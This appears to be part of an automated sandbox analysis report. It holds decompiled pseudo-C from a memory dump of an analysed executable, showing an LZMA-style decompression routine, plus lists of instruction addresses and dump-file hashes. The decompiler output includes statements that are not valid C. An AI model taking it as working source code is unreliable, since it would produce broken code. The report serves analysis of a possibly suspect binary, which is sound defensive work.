								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406c71
0x00406c71
0x00406c75
0x00406d2c
0x00406d2f
0x00406d3b
0x00406c1c
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00407007
0x00407007
0x0040700d
0x0040700d
0x00000000
0x00406fe2
0x00406fe2
0x00406fe6
0x00407195
0x00000000
0x00407195
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00000000
0x00407004
0x00406c7b
0x00406c7f
0x004071c0
0x004071c0
0x004071c3
0x004071c7
0x004071c7
0x00406c85
0x00406c8b
0x00406c8e
0x00406c92
0x00406c95
0x00406c99
0x0040715f
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x00000000
0x004071bc
0x00406c9f
0x00406ca2
0x00406ca8
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00406cd3
0x00406cd3
0x00406cd3
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00000000
0x004069b2
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00000000
0x00406cfd
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00000000
0x00406f8e
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x00000000
0x00407101
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00000000
0x00406f56
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
Instruction ID: 7a557209975026f945a3d96698a9d3e809275b90a73cce2131b371529b247a98
Opcode Fuzzy Hash: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
Instruction Fuzzy Hash: 0F813471D04228CFDF24CFA8C884BADBBB1FB44305F25816AD456BB281C778A996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406776, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406776(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071C8))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
